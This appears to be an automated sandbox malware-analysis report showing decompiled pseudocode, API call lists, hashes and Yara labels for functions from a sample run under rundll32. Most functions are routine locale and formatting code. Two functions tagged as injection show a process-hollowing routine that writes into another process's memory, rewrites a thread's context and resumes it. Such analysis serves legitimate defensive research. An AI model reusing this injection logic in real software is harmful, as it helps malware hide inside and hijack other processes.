                                            • LoadStringA.USER32 ref: 00189BAA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                            • String ID:
                                            • API String ID: 3990497365-0
                                            • Opcode ID: 544af031ec4980e56a3da135131882cf7afbf85bee8eda6bef3ad31869c03b2a
                                            • Instruction ID: c82c699dc1d98eba2fb5402f388904f2100256c999c943c866c3fef3a3683ab9
                                            • Opcode Fuzzy Hash: 544af031ec4980e56a3da135131882cf7afbf85bee8eda6bef3ad31869c03b2a
                                            • Instruction Fuzzy Hash: E0414C70A002589BDB21EBA8DC85BDEB7FDAB19310F4440EAE508E7252D7749F848F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00189AB6, Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00189AB6(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x194660; // 0x180000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00189AAC(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E00186F28( &_v273, 0x104, E0018A938(0x5c) + 1);
				_t75 = 0x189c38;
				_t89 = 0x189c38;
				_t85 =  *0x185b74; // 0x185bc0
				if(E00182FD0(_t92, _t85) != 0) {
					_t75 = E00183E0C( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00186F00(_t75, 0x189c38);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x189c3c;
					}
				}
				_t51 =  *0x193578; // 0x185924
				_t16 = _t51 + 4; // 0xffe7
				_t53 =  *0x194660; // 0x180000
				LoadStringA(E00184840(_t53),  *_t16,  &_v790, 0x100);
				E00182DBC( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00187448(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00186F00(_v8, _t89);
			}































                                            0x00189ac4
                                            0x00189ac7
                                            0x00189ac9
                                            0x00189ad5
                                            0x00189ae4
                                            0x00189b0e
                                            0x00189b14
                                            0x00189b20
                                            0x00189b25
                                            0x00189b2b
                                            0x00189b2b
                                            0x00189b49
                                            0x00189b4e
                                            0x00189b53
                                            0x00189b5a
                                            0x00189b67
                                            0x00189b71
                                            0x00189b75
                                            0x00189b7c
                                            0x00189b85
                                            0x00189b85
                                            0x00189b7c
                                            0x00189b96
                                            0x00189b9b
                                            0x00189b9f
                                            0x00189baa
                                            0x00189bb7
                                            0x00189bc2
                                            0x00189bc8
                                            0x00189bd5
                                            0x00189bdb
                                            0x00189be5
                                            0x00189beb
                                            0x00189bf2
                                            0x00189bf8
                                            0x00189bff
                                            0x00189c05
                                            0x00189c21
                                            0x00189c34

                                            APIs
                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00189AD5
                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00189AF9
                                            • GetModuleFileNameA.KERNEL32(00180000,?,00000105), ref: 00189B14
                                            • LoadStringA.USER32 ref: 00189BAA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                            • String ID:
                                            • API String ID: 3990497365-0
                                            • Opcode ID: 8bff5876f5bc5081468ed5febce5bef49cbdb46c9a0a09c63f2074cf498a3004
                                            • Instruction ID: 2ed62fe29d50a7197910df4a36391a58bf4faa0d2cb043b8fe81e1c0318af937
                                            • Opcode Fuzzy Hash: 8bff5876f5bc5081468ed5febce5bef49cbdb46c9a0a09c63f2074cf498a3004
                                            • Instruction Fuzzy Hash: 86415E70A002589FDB21EB68DC85BDAB7FDAB19310F4440E5F508EB252D7749F848F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0018AA8C, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0018AA8C() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x19473c = 0x409;
				 *0x194740 = 9;
				 *0x194744 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x19473c = _t14;
				}
				if(_t14 != 0) {
					 *0x194740 = _t14 & 0x3ff;
					 *0x194744 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x193114, 0x18abe0, 8 << 2);
				if( *0x1930cc != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x194749 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x194748 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0018AA14(__eflags, _t49);
					}
				} else {
					_t20 = E0018AA74();
					if(_t20 != 0) {
						 *0x194749 = 0;
						 *0x194748 = 0;
						return _t20;
					}
					E0018AA14(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E001829AC(0x193114, 0x20, 0x18abe0);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x194748 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x194749 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x19473c; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x194749 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                            0x0018aa98
                                            0x0018aaa2
                                            0x0018aaac
                                            0x0018aab6
                                            0x0018aabd
                                            0x0018aabf
                                            0x0018aabf
                                            0x0018aac7
                                            0x0018aad3
                                            0x0018aadf
                                            0x0018aadf
                                            0x0018aaf3
                                            0x0018aafc
                                            0x0018abab
                                            0x0018abb0
                                            0x0018abb5
                                            0x0018abbc
                                            0x0018abc1
                                            0x0018abc3
                                            0x0018abc6
                                            0x0018abcc
                                            0x0018abce
                                            0x00000000
                                            0x0018abd6
                                            0x0018ab02
                                            0x0018ab02
                                            0x0018ab09
                                            0x0018ab0b
                                            0x0018ab12
                                            0x00000000
                                            0x0018ab12
                                            0x0018ab1f
                                            0x0018ab2f
                                            0x0018ab31
                                            0x0018ab36
                                            0x0018ab39
                                            0x0018ab3f
                                            0x0018ab41
                                            0x0018ab43
                                            0x00000000
                                            0x0018ab43
                                            0x0018ab4f
                                            0x0018ab54
                                            0x0018ab5a
                                            0x0018ab5a
                                            0x0018ab5c
                                            0x0018ab5d
                                            0x0018ab5e
                                            0x0018ab5e
                                            0x0018ab7a
                                            0x0018ab80
                                            0x0018ab85
                                            0x0018ab8a
                                            0x0018ab90
                                            0x0018ab90
                                            0x0018ab94
                                            0x0018ab97
                                            0x0018ab9d
                                            0x0018ab9f
                                            0x00000000
                                            0x00000000
                                            0x0018aba1
                                            0x0018aba4
                                            0x0018aba4
                                            0x0018aba5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0018aba5
                                            0x0018ab90
                                            0x0018abdd
                                            0x0018abdd
                                            0x00000000

                                            APIs
                                            • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0018AB80
                                            • GetThreadLocale.KERNEL32 ref: 0018AAB6
                                              • Part of subcall function 0018AA14: GetCPInfo.KERNEL32(00000000,?), ref: 0018AA2D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: InfoLocaleStringThreadType
                                            • String ID:
                                            • API String ID: 1505017576-0
                                            • Opcode ID: c5c6054937e5a696a22b7c0c55a3b59f1f5bcc43b3ade66917712a41e37035b0
                                            • Instruction ID: 6d1bd621853908e268b1119286bd032320f87afd3e2649d34435cd458a577900
                                            • Opcode Fuzzy Hash: c5c6054937e5a696a22b7c0c55a3b59f1f5bcc43b3ade66917712a41e37035b0
                                            • Instruction Fuzzy Hash: A03108616402888BF724F7A5AC02BB23797EF12744F884057E5848BA91E7384AC6CF63
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C2B80, Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E001C2B80(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v20;
				char _v24;

				_v12 = 0xffffffff;
				if(E001C2B40(__ecx, _a4) != 0) {
					if(E001C2C40( &_v8,  &_v16) != 0) {
						if(E001C3270(_v8, _a4, _a8,  &_v24,  &_v20) == 1 && E001C37E0(_v8, _v16, _v24, _v20) == 1) {
							_v12 = GetProcessId(_v8);
						}
						if(_v12 == 0xffffffff) {
							TerminateProcess(_v8, 0);
						}
						CloseHandle(_v16);
						CloseHandle(_v8);
						return _v12;
					}
					return _v12;
				}
				return 0;
			}








                                            0x001c2b86
                                            0x001c2b9b
                                            0x001c2bb6
                                            0x001c2bdc
                                            0x001c2c05
                                            0x001c2c05
                                            0x001c2c0c
                                            0x001c2c14
                                            0x001c2c14
                                            0x001c2c1e
                                            0x001c2c28
                                            0x00000000
                                            0x001c2c2e
                                            0x00000000
                                            0x001c2bb8
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a8df6019d96ffa54b4df7d0b57305eac2b8b9eb83b60452f652309e3ce0efd8
                                            • Instruction ID: 71f8f7bd540fc42113cd00b3b66cad470db91e7e20a35973783069a506e46d54
                                            • Opcode Fuzzy Hash: 0a8df6019d96ffa54b4df7d0b57305eac2b8b9eb83b60452f652309e3ce0efd8
                                            • Instruction Fuzzy Hash: F521EFBAD00208BBCF14DBE8D995EEEB778AB68311F108658F915D3241E731DB40DB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C37E0, Relevance: 6.1, APIs: 4, Instructions: 51threadinjectionCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E001C37E0(void* _a4, void* _a8, void _a12, intOrPtr _a16) {
				struct _CONTEXT _v720;

				_v720.ContextFlags = 0x10002;
				E001C14A0( &(_v720.Dr0), 0, 0x2c8);
				if(GetThreadContext(_a8,  &_v720) != 0) {
					if(WriteProcessMemory(_a4, _v720.Ebx + 8,  &_a12, 4, 0) != 0) {
						_v720.Eax = _a16;
						if(SetThreadContext(_a8,  &_v720) != 0) {
							ResumeThread(_a8);
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}




                                            0x001c37e9
                                            0x001c3801
                                            0x001c381c
                                            0x001c3840
                                            0x001c3849
                                            0x001c3862
                                            0x001c386c
                                            0x00000000
                                            0x001c3872
                                            0x00000000
                                            0x001c3864
                                            0x00000000
                                            0x001c3842
                                            0x00000000

                                            APIs
                                            • GetThreadContext.KERNEL32(001C1ECF,00010002), ref: 001C3814
                                            • WriteProcessMemory.KERNEL32(?,?,00500000,00000004,00000000), ref: 001C3838
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ContextMemoryProcessThreadWrite
                                            • String ID:
                                            • API String ID: 2099319263-0
                                            • Opcode ID: fbe81fe8651e212880b5fc5c2ad2ca189d9d1435532eaf5514bc202cd675e66b
                                            • Instruction ID: 35b60a2458d739c4bf9a4813930894830aa7400860adc313570d40bca1a568d8
                                            • Opcode Fuzzy Hash: fbe81fe8651e212880b5fc5c2ad2ca189d9d1435532eaf5514bc202cd675e66b
                                            • Instruction Fuzzy Hash: C5116D75A45209ABEB14CF64EC49FEE37B8AB28744F10C65CFA19D6180E730DA50CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0018831C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 72%
                                            			E0018831C(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x1883fa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00183980(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00183A18( &_v8, 0x18841c);
				} else {
					E00183A18( &_v8, 0x188410);
				}
				_t32 = E00183E0C(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E00183BF0(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E00183E64( *_t49, E00183C1C( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00188401);
				return E00183980( &_v8);
			}













                                            0x00188329
                                            0x0018832c
                                            0x0018832e
                                            0x00188332
                                            0x00188333
                                            0x00188338
                                            0x0018833b
                                            0x00188340
                                            0x0018834c
                                            0x00188357
                                            0x00188362
                                            0x00188369
                                            0x00188382
                                            0x0018836b
                                            0x00188373
                                            0x00188373
                                            0x00188396
                                            0x001883af
                                            0x001883be
                                            0x001883c4
                                            0x001883df
                                            0x001883df
                                            0x001883c4
                                            0x001883e6
                                            0x001883e9
                                            0x001883ec
                                            0x001883f9

                                            APIs
                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,001883FA), ref: 001883A2
                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 001883A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: DateFormatLocaleThread
                                            • String ID: yyyy
                                            • API String ID: 3303714858-3145165042
                                            • Opcode ID: b9003719d4761994f81047185cde2beaa648473ec652b71cfdf81f4a465efc4b
                                            • Instruction ID: e206810f7a37734cc20398f9885eb4fe810c038710a3d14fd13a6f3a61a74a25
                                            • Opcode Fuzzy Hash: b9003719d4761994f81047185cde2beaa648473ec652b71cfdf81f4a465efc4b
                                            • Instruction Fuzzy Hash: 62217139600608ABDB00FB68C982AAEB3A8FF18B00F9440A5F815E7751DB70DF00CF65
                                            Uniqueness

                                            Uniqueness Score: -1.00%